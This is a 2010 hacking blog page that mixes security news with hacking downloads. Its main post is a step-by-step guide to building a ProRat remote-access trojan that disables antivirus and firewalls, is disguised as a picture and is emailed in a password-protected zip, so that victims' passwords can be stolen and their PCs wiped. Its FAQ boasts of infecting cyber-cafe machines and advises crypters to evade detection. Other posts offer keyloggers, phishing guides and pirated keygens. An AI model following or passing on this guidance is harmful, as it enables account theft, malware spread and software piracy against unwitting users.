Email Login| Link Exchange | Cyber News | Phishing Attack | SQL Injection | SEO | DOS Attack | Hacking Tools | |Hacking Tricks | Penetration Testing | Trojans & Keyloggers |Hacking Videos | General Discussion | Website Hacking | Session Hijacking | Social Engineering | Anonymous Surfing | Recover Passwords | Bypass Firewall | Hacking Books | Network Sniffers | Password Cracking | Enumerating & Fingerprinting | Movies & Songs

Share This Post With Your Friends

Friday, May 7, 2010

Hack Globe7: How to Make Free Calls From PC to Mobile Using Globe7 Application

NEW POST STARTING FROM HERE - UPDATED ON 10th MAY, 2010

I have received a lot of comments & mails regarding the tools published on 7th may. A lot of readers has faced problem with it. Now I have tested this new tool and it successfully working. If still you face problem.........BETTER NOT TO WASTE MORE TIME ON IT AND SEARCH FOR SOME OTHER SOFTWARES...LOLZZ..!!

Its a PATCH that, automaticly watches videos. By the way you will get CREDIT .. to make free call, but the maximum CREDIT u can make, with THAT PATCH is about 0.120
  • Send Free SMS to any mobile and stay connected with your offline friends.
  • Create your own channel and share videos with your friends.
  • Get a Free US phone number and receive calls on your PC or Laptop.
  • Globe7 is ranked as No.1 voipprovider across the Globe.
  • www.myvoipprovider.com.
  • Make Free Calls to any phone across the Globe by watching Globe7 videos.
DOWNLOAD PATCH LINK - 1

If the link-1 is not working, or you face any problem, use link-2

DOWNLOAD PATCH LINK - 2


---------------------------------------------------------

PREVIOUS POST STARTING FROM HERE - POSTED ON 7th MAY, 2010



DOWNLOAD HERE


Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here.

Download Free Hacking Tools & software: Download Best Hack softwares & Tools


DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here.

HTML Editor Free Download: HTML Editor Full Version Software


DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here.

Hex Editor Free Download: Download Best Hex Editor


DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here.

Create Fake login page: Download Fake login page for Gmail, Facebook & Twitter

  • How to Hack Facebook Account Passwords Using Phishing Attack..
  • How to Hack Twitter Account Passwords Using Phishing Attack..

MORE HACKING TIPS TRICKS USING TROJANS & KEYLOGGERS
  • How to hack facebook using Facebook Freezer. To download the software
  • How does an attacker installed any trojan on the victim's computer? How to bypass antivirus ? Answer: Using Wrappers. To know more click here
  • Which are various back doors, Trojans and Key loggers available and how they work? To Get a complete guide regarding all famous back doors...click here
  • How you can spread you Trojan, virus OR keylogger on network or internet ? To know which all are various modes of transmission..CLICK HERE
  • How many different types of trojans, backdoors and keyloggers are available on internet.. To know CLICK HERE
  • To know working of trojan OR how trojan works..CLICK HERE
  • A very good source to download free Keyloggers, Trojans and password stealer's. CLICK HERE

Website Hacking Tutorials & Techniques: How to Hack Websites Database & Webservers

Friends, I am posting website hacking tutorials & Techniques from last 2 years. I am receiving a lot of mail from new readers regarding similar tutorials. Here I am indexing all good posts related to Website Hacking. Hope you like this collection. Pls comment if you like.




The best vulnerability scanner software and assessment tool: Nessus






How to Scan all open TCP and UDP ports using VISION


Penetration Testing on a Corporate Network using CREDDIGGER

How to Scan the Open Ports Through Firewall using Fscan

Worm spreading via Yahoo Messenger

A worm is spreading via Yahoo Instant Messenger Thursday that tricks people into downloading what they think is a photo from a friend but is instead malware that installs a backdoor on Windows systems and spreads to a victim's IM contacts.

The worm arrives via a message from a contact with the word "photo" or "photos" and a smiley face icon, along with a link to a Web site resembling a Facebook page, MySpace page, or some other page where photos might reside.

If the user clicks on the link on a Macintosh system, an executable file will be downloaded, but no further action will occur. On a Windows system, the executable will download and if the user runs the file, the computer will become infected and the malicious message will be distributed to all of the IM contacts.

Once run, the worm copies itself to %WinDir%\infocard.exe, then it adds itself to the Windows Firewall List, modifies registry keys, and stops the Windows Updates service.

Symantec detects the malware as W32.Yimfoca and said it affects Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, and Windows 2000.

"It's very dangerous," Zulfikar Ramzan, technical director at Symantec Security Response, said in an interview. "When you get an IM from someone you know you're more likely to click on it."

The worm drops software onto infected computers that can be used to turn them into zombies on a botnet, he said. But, once that back door is on the compromised system anything really is possible, he added.

BitDefender said in a blog post that the "aggressive" worm is part of a family of worms that can intercept passwords and other sensitive data.

Security firm Bkis also has information on the worm, which has been spreading throughout the
week.

Yahoo said in a blog post that it was aware of the issue and working to address it.

Backdoor.Bifrose is a backdoor trojan that attempts to propagate by exploiting local network shares

Submission Summary:

  • Submission details:
    • Submission received: 6 May 2010, 09:12:21
    • Processing time: 7 min 10 sec
    • Submitted sample:
      • File MD5: 0x781B86CC1F4C795C85A83C9289F275C5
      • File SHA-1: 0xE8C72369D91D0188D9B5138574E0CDF39296D3E5
      • Filesize: 29,117 bytes
      • Alias:
        • Trojan.Agent.CZZK [PCTools]
        • Trojan Horse [Symantec]
        • Trojan.Win32.Agent.bcn [Kaspersky Lab]
        • BackDoor-CEP.svr [McAfee]
        • BKDR_BIFROSE.AFU [Trend Micro]
        • Troj/Agent-JZZ [Sophos]
        • Backdoor:Win32/Bifrose.ACI [Microsoft]
        • Win-Trojan/Bifrose.29053 [AhnLab]
  • Attention! Characteristics of the following security risk was identified in the system:

Security Risk Description
Backdoor.Bifrose Backdoor.Bifrose is a backdoor trojan that attempts to propagate by exploiting local network shares. It will also attempt to join a predefined IRC server and channel in order to participate in DDoS attacks.

  • Attention! The following threat category was identified:

Threat Category Description
A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment

FOR FULL REPORT VISIT HERE

Thursday, May 6, 2010

Download Freeware Keylogger Full Version

Free Keylogger monitors computer activities.

Freeware Keylogger is a completely free award winning monitoring application. It runs in the background and allows you to monitor all keyboard activities performed on your PC, visited websites, e-mail, chat, openned application and files. Freeware Keylogger helps you to find out, what exactly took place in the system. You will find out what your employee or children search in the internet, and to check them. You will be able to view the reports as HTML files. The software is 100% Free application.

product submission by Company Rep

fact sheet
ID#: 1271522016
date posted: May 3, 2010
category: Security:Filtering/Monitoring
platform: WinXP,WinVista,WinVista x64,Win7 x32,Win7 x64,Win2000,Windows2000,Windows2003,WinServer,Windows Vista Ultimate x64,Win98,WinME,WinNT 3.x,WinNT 4.x,Windows Vista Home Premium
vendor: KRyLack

Download Freeware Keylogger

How to Create a Keylogger in Visual Basic 2008

The following video shows how you can make a keylogger in Visual Basic 2008. Follow the steps below to create your own keylogger. First you will want to open a new application and name it according to your preferences. Then you want to click on the toolbar button and click textbox.

In the textbox values, you will want to select the value of true for 'Multiline' option and the value of True for 'Read only'. On the toolbar, select the 'Behavior' tab and mark it as 'Window'. Go back on to the main page known as form 1. Enlargen the area to your preferences. Next click on 'Timer' as per the toolbar.

Enable the 'Behavior' and for interval time put in '2'. Text will appear on your form. Highlight and select the text that states 'Dim result as integer." Next, click on the 'Private sub values.' Highlight the Private values ranging from 'for i' to 'next i'. Select the text area. Your keylogger has now been created.

Click on a word pad or note pad application and insert some text. The text will now appear on the form you were working with. Your keylogger is now a success!

According to the latest figures released by NetApplications, Google’s own browser – Chrome – now has a 6.7% market share, which is a feat of great magnitude, considering it had zero prior to 2009. But why has Chrome suddenly become popular?

As a Google Chrome user myself, I have noticed the speed at which the browser loads pages. And my god, it is fast. Sometimes though, it is too fast and tends to become impatient, sometimes timing out very quickly forcing you to reload the page. Although it is an annoyance, it’s a very small one which should be fixed In future releases.

During the years when Internet Explorer was the only choice of web browser, we will forget Netscape for now… It seems that it has always been riddled with security issues. Something that Google have addressed as a priority.

Chrome is secure, by taking advantage of “sandboxing,” which isolates internet commands from the operating system and other applications and data. This makes it harder for hackers to infect you with suggested malware and spyware. Plus, due to Chrome’s low market share at the present time, hackers are less likely to hack the browser. Why would they if Firefox and Internet Explorer are far more popular?

Chrome is also immensely easy to use, It tries to be nothing more than just a browser. No fancy menu’s, slim toolbars for greater page viewing and easy bookmark management. Couldn’t ask for more (or less).

That is my three reasons why you should choose Google Chrome over Internet Explorer, if you agree or even disagree with any of the points made, please feel free to make some suggestions of your own in the comments below.

This post has been submitted by By Jamie Pert. Jamie has a background in computer repairs and maintenance along with network administration, he now enjoys utilizing the benefits of new technologies and enjoys writing about anything that brings new technology to the world.

US Government Websites Hacked

The US Treasury's Bureau of Engraving and Printing has been attacked by hackers. The Bureau, along with three other official government web sites, were targeted in an attack that redirected visitors to web sites containing malicious content. The websites affected were BEP.gov, BEP.treas.gov, Moneyfactory.gov and Moneyfactory.com. The sites were taken down as soon as the breach was discovered. According to security experts at anti-virus software maker AVG, the web sites were hacked using an iFrame application that injected malicious codes into the site. The malware was used to send data to computers somewhere in Ukraine. Roger Thompson, chief research officer at AVG, told tech blog http://www.v3.co.uk/v3/news/2262459/treasury-web-sites-hacked V3.co.uk: “City and country-level sites get hacked all the time in the US and UK but it’s very unusual to see an attack like this.” Thompson added that an initial study of the attack shows that there was an 80 per cent chance it was mounted from a third-party site visitor counter. If this was the case, he said, the problem might be difficult to fix.

SOURCE: http://www.itproportal.com

External agency has hacked Indian Army officer's PC

The computer of an Indian Army officer posted in the Andaman and Nicobar Islands has been hacked by "an external agency", a defence officer said on Thursday.

"It is a case of computer hacking through an external agency. The matter is under investigation," army spokesperson Colonel S. Om Singh said.

The spokesman said there was no evidence to suggest an "espionage case" involving the officer, who is a major.

Denying that the officer was called to Delhi and kept under the safe custody, Singh said: "He is on duty in his parent unit."

The major has come under the scanner of security agencies in the wake of the alleged transfer of data from his computer to Pakistani agencies.

The tip-off about the hacking, according to sources, had come from a US intelligence agency.

The sources said a picture of a serving Indian brigadier attending a training programme in the US was sent to Pakistan from an IP address that was tracked to the computer of the major.

A report in a national daily Thursday said that the officer was suspected to be involved in espionage activities -- the second such case after an Indian diplomat in the high commission in Islamabad, Madhuri Gupta, was arrested last month for allegedly passing on sensitive information to Pakistani spy agencies.a

Wednesday, May 5, 2010

Free Keygen Download for Windows XP, Office, XP SP1 & SP2

  • Crack for LH, XP and .NET
  • Microsoft Business Network Professional v1.0 SP1 -kEyGeN-
  • Microsoft CRM Server v1.2 -kEyGeN-
  • Microsoft ISA Server v2004 Enterprise -kEyGeN-
  • Microsoft ISA Server v2004 -kEyGeN-
  • Microsoft kEyGeN 2000
  • Microsoft Office Communicator 2005 v1.0.559 -kEyGeN-
  • Microsoft Office Professional v2003 -kEyGeN-
  • Microsoft Operations Manager 2005 -kEyGeN-
  • Microsoft Plus! Digital Media Edition -kEyGeN-
  • Microsoft Visual FoxPro v9.0 -kEyGeN-
  • Microsoft Windows Longhorn -kEyGeN-
  • Microsoft Windows Media Center Edition 2005 -Activator-
  • Microsoft Windows Server 2003 -kEyGeN-
  • Windows Multi kEyGeN
  • Windows Server 2003 Enterprise VLK -kEyGeN-
  • Windows Server 2003 x64 Edition VOL -kEyGeN-
  • Windows XP Activation Patch
  • Windows XP Activator
  • Windows XP Product Key Viewer and Key Changer
  • Windows XP Professional -kEyGeN-
  • Windows XP Professional x64 Corporate -kEyGeN-
  • Windows XP Service Pack 1a -kEyGeN-
  • Windows XP Service Pack 2 -kEyGeN-
  • Windows XP SP2 Home & Pro Activation -cRaCk-
  • Windows.Genuine.Advantage.Validation.v1.5.526.0.CRACKED-ETH0
In windows NT Folder you antivirus may detect a virus. Don't worry. Quarantined it.

DOWNLOAD HERE

THIS POST HAS BEEN UPDATED. OLD POST AND DOWNLOAD LINK REMOVED.

Want to learn how hackers work? Try out Google’s new course.

Google has launched a new course to teach students how hackers find security vulnerabilities and exploit web applications.

Participants in Google’s Web Application Exploits and Defenses codelab get to play the part of a malicious hacker, finding and exploiting security bugs.

“The codelab is built around Jarlsberg, a small yet full-featured microblogging application with lots of security bugs,” explained Bruce Leban, a software engineer at Google, in an

The Jarlsberg application, which lets users publish bits of text and store files, is riddled with bugs including denial of service (DoS), information disclosure and remote code execution.

Students will get to try out two forms of attacking, the first being ‘black-box hacking’. With this, they will try and locate security bugs by experimenting with the application, manipulating input fields and URL parameters. Participants will also try to cause application errors, while monitoring HTTP requests and responses to guess server behaviour.

‘White-box hacking’, meanwhile, allows the user to look through the Jarlsberg source code to find bugs, which can also be located using automated or manual analysis.

While Google is elucidating on how cyber criminals work, its aim is to show how software developers can protect applications and stop hackers in their tracks.

The search giant warned that participants should use what they learn to make their own applications more secure and not use their new-found knowledge to attack any applications other than their own. Even the latter should be done with proper permission from the right authorities, Google added, such as the company’s security team.

Graham Cluley, senior technology consultant at IT security firm Sophos, said that education on finding security vulnerabilities in software and how to write code more securely is “very important for firms”.

He told that this can help stop the problems at the source and prevent hackers from exploiting vulnerabilities later on.

Depression Symptoms & Treatment | Best Stress Management Techniques

What's wrong, why you are looking so worn-out. You don't know why ?? Someone has told you that you are suffering from depression.

Well I could feel the pain. As a reader of my blog, you need not worry. As these days, every third person is under depression. But.....but what ?? You are confused.

WHY? CLICK HERE to know.

You don't see any thing stressing you. So let me clear you one thing my dear friend that you are not an isolated case. A majority of people don't even realise the perils of modernisation - how they get trapped in the vicious circle of performance and expectation, which ultimately pushes them towards a stressful life.

Continuous exposure to this "ill-condition" has telling physiological and psychological effects on an individual. The irony is that the person feels sick but fails to identify the root cause.

If you consult to a psychiatrist, he will explain you "The cause is may be at micro level or macro level. Any stressful condition, over a period of time, can manifest itself in different forms in our body, which vary from person to person. Initially, a patient complains of headache, body aches, lack of appetite and restlessness. We call them psychosomatic symptoms and only an expert can detect these changes at very early stage."

BUT still you can't put your finger on any single cause, but there are little things that bother you....Am I correct ??

Loss in business, son is not doing well in school, wife is always nagging and your subordinates irritate you. And the most worse situation is that your blood pressure & sugger levels are shooting up.

Though you have been taking the prescribed medicines for the last six months, still you condition is not improving. You feel drained out physically & mentally and have even started suffering from low self-esteem. You find yourself totally wasted........AND YOU ALREADY BEEN CONSULTED TO 3-4 DOCTORS & PSYCHIATRIST.

Still you are asking WHAT SHOULD I DO.....

You want to get happiness, success & stress-free life. Want to control you rage. Want to grow from rich to elite....Here is the solution. You no need to worry any more.

Using this book TIT FOR TAT TO TREAT FOR TAT you will definately feel a sudden change in your life. This book has been published by LIFE CARE FOUNDATION. Author Dr.pal is giving international level training to executives of corporate world, faculty members of different schools, colleges & universities. Dr.Harvinder Pal Singh has trained thousands of individuals across the country. His thesis on Stress Management was adjudged the best at the national level by Apollo Hospitals.

Book your copy today online: CLICK HERE

Tuesday, May 4, 2010

Download Keyloggers Full Version Free

Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file.

The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.
Info: http://www.award-soft.com

DOWNLOAD HERE
Ardamax Keylogger v2.9 [With Working Serial Included]

Ardamax Keylogger is a useful keylogger that will record users activity and will save it to a logfile. It's very easy to use.

The logfile can be viewed as a text or web page. Use this tool to find out what is happening on your computer while your away, maintain a backup of your typed data automatically or use it to monitor your kids.

DOWNLOAD HERE

pass: Knight999


If you face any problem, or found any broken link, pls leave a comment here.

How to Hack Facebook Account Passwords Using Trojans & Keyloggers

Here I am demonstrating using PRORAT trojan. You can also check the list of trojans & Keyloggers here which I have already posted few months back. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. I strictly recommend you to try these trojans & keyloggerson some testing system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP-3: Open Notifications. Select second option "Mail Notification". In the E-MAIL field you will see a mail
id: . Remove this mail ID and give your own mail id here. You will receive a notification
email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview
of what they mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.
[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets
online)
[x] Kill AV - FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed
on the victim's computer.
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications ( keeps other computers on the victim's network from knowing about you )
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must
click on the ''Bind the server with a file'' button and then the file button will be activated. You can choose
a file to be binded with the server now. A good suggestion is a picture because that is a small file and its
easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don't
support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the
menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with
name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file "binded_server" to victim. You can send this trojan server via email, pendrive or if
you have physical access to the system, go and run the file.

From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with
ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When
the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened this ZIP
folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you
will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now
press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered
while creating the server? that is what you need to type. By default, it is "123456" without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP
address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it
back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess
with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will
make the computer useless.

Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

FAQ:

Q: Error message:Windows cannot access the specified deice, path, or file. You may not have the appropriate
permissions to access the item. What do I do?
A: Simple! Delete the ProRat program. Delete it. What happen was, your AV has altered the file. OR it could be m
alacious content. Either way, delete it. NEXT, remember the file you downladed? Un extract the file again and
re run. You will not need to remake a server file and such if it has been sent to the victim. Just open ProRat
and make sure your AV is shut off. Reconnect. There ya go.

Q: What operating systems are supported by ProRat?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus
also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. Few years back I have installed my server manually on
1000's of cyber cafe in my city. I hacked almost the entire city cafe users secret information. This is the
best way. Go to nearest cyber cafe's and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your
antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it
FUD(Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?
A: No. ProRat is a legal RAT. The author of ProRat created his program for legitimate purposes. For example,
there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc.
Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law,
but the person who uses it.

Q: Can ProRat be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites.
You can find out if someone uses your computer while you are away, ensure no one is accessing your personal
files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter. Also check the below links how to make trojan or keylogger fully undetectable from antivirus.
THIS TUTORIAL HAS BEEN CREATED WITH THE HELP OF AN UNDERGROUND HACKER flAmingw0rm. THANKS TO YOU MAN TO MAKE
THIS POSSIBLE.

Readers, we don't want any thing from you in return except a thanks. Pls comment here so that we can post
better contents and improve the stuff quality.

Megaupload Rapidshare Hacking Software Download

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

Keygen Software Download Free: Multi Stardock Keygen Pack

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

Download Free Music Players Full Version

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

Online Scams: Beware of Online Fraud When buying online for Mothers Day

According to CyberDefender, a Los Angeles-based security company, Mother’s Day has been increasingly targeted by malware authors due to the growing online use of credit cards and services like PayPal.  The idea is to drive shoppers to act impulsively in order to receive a great deal on the perfect gift for mom.

Cyber criminals target shoppers in many different ways:
  • Tricking users into giving out personal information
  • Tricking users into downloading malware to their PCs
  • Redirecting users to fraudulent sites through spam
“Salesy” subject lines should not be trusted – the presence of exclamation points is a dead giveaway as well:
  • The perfect gift idea for Mother's Day!
  • Mom Will Love Getting this E-Card!
  • Give Mom a Personalized Gift! Hurry – before time runs out!
  • Mothers Day Exclusive!
Sites to be avoided, as they have previously been found by CyberDefender to contain scams:
  • 2000greetings.com
  • freewebcards.com
  • fun-e-cards-.com
  • fundsilly.com
  • celebwelove.com
  • fukkad.com
  • funnyreign.com
  • eforu.com
  • ecard4all.com
  • myfuncards.com
Tips from CyberDefender:
  1. Make sure you have a subscription-based security software installed in your computer; in fact, some home users install two different packages to get the advantages of two different vendor offerings
  2. Choose a security software vendor that uses a peer to peer network to identify threats and updates its software frequently; legitimate security firms register the PCs of their subscribers and download updates over the Internet to your home PC several times a day.  You can find out how many times by calling the vendor’s customer service number.
  3. Stick to reputable online flower retailer sites such as hallmark.com, 1-800-flowers.com, americangreeting.com, proflowers.com, etc.
  4. Go to a company’s website directly to order your gift, instead of clicking on links found in emails and social networks
  5. Have Dad monitor children when shopping online for Mom. Children might not know the difference between a reputable and a fraudulent site
  6. If a website asks for your social security number at check-out, the website is probably phishing for your private information, putting you at risk for identity theft
  7. Ensure that the website you plan to order from is secured using SSL. When entering any type of credit card or payment information, you should see a “lock” icon on the bottom right of your screen (location varies among browsers)

Monday, May 3, 2010

Patch Maker Software Free Download: Programs Helps you to Make Patch

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

Download Disk Utility: O&O Disk Recovery Softwares

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

How to Create Portable Programs: Download Guide & Softwares

DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here

Mobile Unlocker: Download Mobile Unlocking Software


DOWNLOAD HERE

Passwords is: Tiger2403

If the above password is not working..try this: Tiger2403.dl.am

If you face any problem, or find any broken link...just leave a comment here.

Adobe PDF unfixed flaw exploited by hackers

Several security companies warned of a major malware campaign that tries to dupe users into opening rigged PDFs that exploit an unpatched design flaw in the format

Users who open the attack PDFs are infected with a variant of a Windows worm known as "Auraax" or "Emold," researchers said.

The malicious messages masquerade as mail from company system administrators and come with the subject heading of "setting for your mailbox are changed," said Mary Grace Gabriel, a research engineer with CA Inc.'s security group. A PDF attachment purportedly contains instructions on how to reset email settings. "SMTP and POP3 servers for ... mailbox are changed. Please carefully read the attached instructions before updating settings," the message states.

In reality, the PDFs contain embedded malware and use the format's /Launch function to execute that malware on Windows PCs running the newest versions of the free Adobe Reader, Adobe's for-a-fee Acrobat and other PDF viewers, such as Foxit Reader.

The /Launch feature is not a security vulnerability per se, but actually a by-design function of the PDF specification. Earlier this month, Belgium researcher Didier Stevens demonstrated how attack PDFs could use /Launch to run malware tucked into documents.

Two weeks ago, security researchers tracked a new run by the Zeus botnet that used the /Launch flaw to infect PCs.

Adobe has previously declined to answer questions on whether in-the-wild use of /Launch in rigged PDFs would prompt the company to update Reader and Acrobat, although it has said a change to the functionality might "conceivably [be made] available during one of the regularly scheduled quarterly product updates." Brad Arkin, Adobe's head of security and privacy, has acknowledged that one possible solution would be to disable the function; currently, it's turned on by default.

After analysing the attack PDF, other researchers found that hackers are using Stevens' tactic of modifying the warning that Reader and Acrobat display. Adobe Reader, for example, displays a message telling users to open only those files they know are safe. In the same Windows dialog box, Reader displays the filename of the file about to be launched. According to IBM Internet Security Systems researchers, hackers have modified the warning to simply read, "Click the 'open' button to view this document."

READ FULL ARTICLE HERE

How to Stop Hackers? Use Hackers Technique & Tools Against them

Giving hackers a dose of their own poison - Technique allows agencies to turn hackers' tools against them.

Hackers who attack federal Web sites may soon be in for a dose of their own poison. The government is able to use hackers' own malware to strike back, and some may already be doing so, according to reports.

Security consultant Andrzej Dereszowski last week demonstrated his proof-of-concept idea at Black Hat Europe. While illegal for companies, some government agencies may be able, or already are, using such techniques, reported Kelly Jackson Higgins this week in Dark Reading. These techniques are similar to those used for botnet infiltration research, he added.

While an IT professional would need to know reverse engineering and exploit-development techniques, the method is generic and could be applied to any case, allowing organizations to quickly analyze and respond to malware attacks, said Dereszowski.

Dereszowksi’s PoC exploited a buffer overflow bug in the malicious Poison Ivy trojan, which was in an infected PDF sent to a pharmaceutical company. He ran the attack via his virtual machine against its own command-and-control server.

Dereszowski began by assuming the malicious code was publicly available online, and then broke the code to a run static analysis of it. He then ran a Metasploit shell code to open an active connection to the command-and-control server. The counterattack would be invisible to the attacker, and would exit the system once finished, leaving the exploit behind with a window into the server.

This form of counterattack could apply to other trojans, such as the pervasive Zeus Trojan, said Dereszowski, as long as there is access to the attacker's server and the malware code. While the counterattack could theoretically “do lots of damage because you would have full permission on their host," the actual effects depend on how well the attacker's own systems are protected, he said.

Targeted attacks on government agencies are common and on the rise, and are frequently done by other governments to steal data. In a recent poll at FOSE, reported by GCN, 94 percent of government and related information technology professionals believe federal agencies and networks get attacked every day. The findings were similar to CDW-G’s November 2009 Federal Cybersecurity Report.

A copy of Dereszowski's white paper on the counterattack research, released March 15, is available here for download (PDF).
Newer Posts Older Posts Home